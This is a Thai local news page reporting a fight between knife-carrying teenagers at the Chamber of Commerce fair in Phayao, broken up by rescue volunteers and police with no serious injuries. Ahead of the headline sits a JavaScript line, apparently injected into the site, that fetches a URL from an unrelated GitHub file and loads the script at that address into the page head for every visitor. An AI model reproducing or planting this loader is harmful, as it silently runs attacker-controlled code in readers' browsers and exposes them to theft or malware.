;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); พะเยา วุ่น! งานหอการค้าแฟร์ วัยรุ่นเขม่นกันกลางงาน กู้ภัย-จนท.เร่งเข้าห้าม หวิดบานปลาย - ThaiReference | อาสาไทยยืนยัน
พะเยา วุ่น! งานหอการค้าแฟร์ วัยรุ่นเขม่นกันกลางงาน กู้ภัย-จนท.เร่งเข้าห้าม หวิดบานปลาย

บรรยากาศงานหอการค้าประจำปี 2568ในพื้นที่จังหวัดพะเยาแห่ง บริเวณหลังเทศบาลเมืองพะเยา เกิดเหตุวุ่นวายขึ้นกลางงาน หลังกลุ่มวัยรุ่น 2 กลุ่มมีปากเสียงกันและทะเลาะวิวาทไล่ต่อยตีกันภายในงานทำให้ประชาชนที่มาร่วมงานจำนวนมากแตกตื่น วิ่งหนีกันอลหม่าน เหตุเกิดจากวัยรุ่นเริ่มมีการไล่ต่อยกันโยนขวดใส่กัน  เจ้าหน้าที่รักษาความปลอดภัยของงานพร้อมอาสากู้ภัยสยามรวมใจที่อยู่ในพื้นที่ต้องรีบเข้าห้ามปรามและกันตัวออกจากกันอย่างทุลักทุเลเนื่องจากกลุ่มวัยรุ่นมีอาวุธมีดโชคดีไม่มีผู้ได้รับบาดเจ็บรุนแรง แต่อย่างไรก็ตาม เจ้าหน้าที่ตำรวจที่ดูแลความเรียบร้อยภายในงานได้ควบคุมสถานการณ์ไว้ได้ทัน พร้อมเชิญตัววัยรุ่นทั้งสองกลุ่มไปพูดคุยนอกพื้นที่งานเพื่อป้องกันเหตุซ้ำ

ทั้งนี้ คณะผู้จัดงานหอการค้าได้ออกประกาศขอความร่วมมือผู้ร่วมงานให้รักษาความสงบเรียบร้อย และเพิ่มกำลังเจ้าหน้าที่ดูแลความปลอดภัยโดยรอบงาน เพื่อป้องกันเหตุไม่คาดคิดในช่วงคืนถัดไป ประชาชนและพ่อค้าแม่ค้าที่ตั้งร้านภายในงาน ต่างหวั่นเกรงจะเกิดเหตุซ้ำ ขอให้เจ้าหน้าที่เข้มงวดตรวจตรามากยิ่งขึ้น เพื่อให้งานสามารถดำเนินไปจนจบอย่างราบรื่น.

ภาพ-ข่าว ปัณณวิชญ์ อยู่ดี จ.พะเยา